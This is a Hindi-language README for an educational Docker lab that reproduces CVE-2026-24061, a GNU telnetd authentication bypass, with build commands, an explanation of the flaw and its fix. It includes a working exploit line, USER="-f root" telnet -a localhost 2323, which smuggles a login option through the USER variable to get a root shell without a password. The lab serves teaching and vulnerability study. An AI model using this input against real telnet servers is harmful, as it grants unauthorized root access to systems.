
# CVE-2026-24061 के लिए शैक्षिक Docker लैब GNU telnetd में प्रमाणीकरण बायपास का प्रदर्शन करने वाला शैक्षिक Docker लैब, जो USER पर्यावरण चर में तर्क इंजेक्शन के माध्यम से रूट एक्सेस की अनुमति देता है।
इस रिपॉजिटरी में CVE-2026-24061 भेद्यता को प्रदर्शित करने के लिए एक सरल Docker लैब शामिल है। यह लिनक्स पर GNU telnetd में प्रमाणीकरण बायपास और root के रूप में पहुंच की अनुमति देता है।
इसका उद्देश्य पूर्णतः शैक्षिक है।
docker build -t cve-2026-24061 .
docker run -it -p 2323:23 cve-2026-24061
दूसरे टर्मिनल में, निम्नलिखित चलाएँ:
USER="-f root" telnet -a localhost 2323
इसके बाद, पासवर्ड मांगे बिना सीधे root के रूप में पहुंच प्रदान की जाएगी।
यह दोष /usr/bin/login उपयोगिता के आह्वान के दौरान तर्क इंजेक्शन के कारण उत्पन्न होता है। telnetd लॉगिन को कॉल करने के लिए उपयोग की जाने वाली कमांड लाइन को गतिशील रूप से बनाता है और प्लेसहोल्डर %U के माध्यम से USER पर्यावरण चर का मान शामिल करता है, बिना किसी सैनिटाइज़ेशन के।
चूंकि लॉगिन उपयोगिता -f विकल्प स्वीकार करती है, जो पासवर्ड प्रमाणीकरण को अनदेखा करता है, एक हमलावर USER="-f root" सेट कर सकता है और सीधे root के रूप में लॉगिन को बाध्य कर सकता है।
चूंकि telnetd उच्च विशेषाधिकारों के साथ चलता है, यह हेरफेर तुरंत वैध क्रेडेंशियल्स की आवश्यकता के बिना root शेल में परिणत होता है। शोषण सरल है, पूर्व इंटरैक्शन की आवश्यकता नहीं है, और इसे आसानी से स्वचालित किया जा सकता है, जो CVSS 9.8 स्कोर को उचित ठहराता है।
USER चर के सत्यापन और सैनिटाइज़ेशन की शुरुआत के साथ भेद्यता को ठीक किया गया था, जो हाइफ़न से शुरू होने वाले मानों और विशेष वर्णों को अवरुद्ध करता है, जिससे लॉगिन में तर्क इंजेक्शन रोका जा सके।